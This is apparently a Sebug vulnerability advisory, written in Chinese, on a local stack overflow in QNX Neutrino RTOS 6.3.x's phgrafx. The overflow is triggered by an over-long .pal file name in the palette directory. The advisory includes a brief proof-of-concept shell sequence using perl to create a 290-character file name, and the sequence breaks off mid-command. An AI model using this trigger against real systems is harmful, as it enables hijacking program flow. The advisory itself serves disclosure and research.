BUGTRAQ ID: 30024
QNX Neutrino RTOS是嵌入系统中所使用的实时操作系统。
QNX RTOS的/usr/photon/bin/phgrafx文件没有正确地处理PHOTON_PATH/palette/*.pal文件,如果用户在palette目录中创建了文件名大于285字符的.pal扩展名的话,就会触发栈溢出,允许攻击者完全控制程序流。
QNX Neutrino RTOS phgrafx本地栈溢出漏洞
Published:2008-07-01
Vulnerable:
QNX Neutrino RTOS 6.3.2
QNX Neutrino RTOS 6.3.0
Discription:
<*References
Filipe Balestra (filipe@balestra.com.br)*>
http://marc.info/?l=bugtraq&m=121492463823645&w=2
SEBUG Solution:
Exploit:
[www.sebug.net]
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
# PHOTON_PATH=/tmp
# cd /tmp
# mkdir palette
# cd palette
# touch `perl -e 'print "A" x 290 . ".pal"'`
# /usr/
// Sebug.net [ 2008-07-03 ]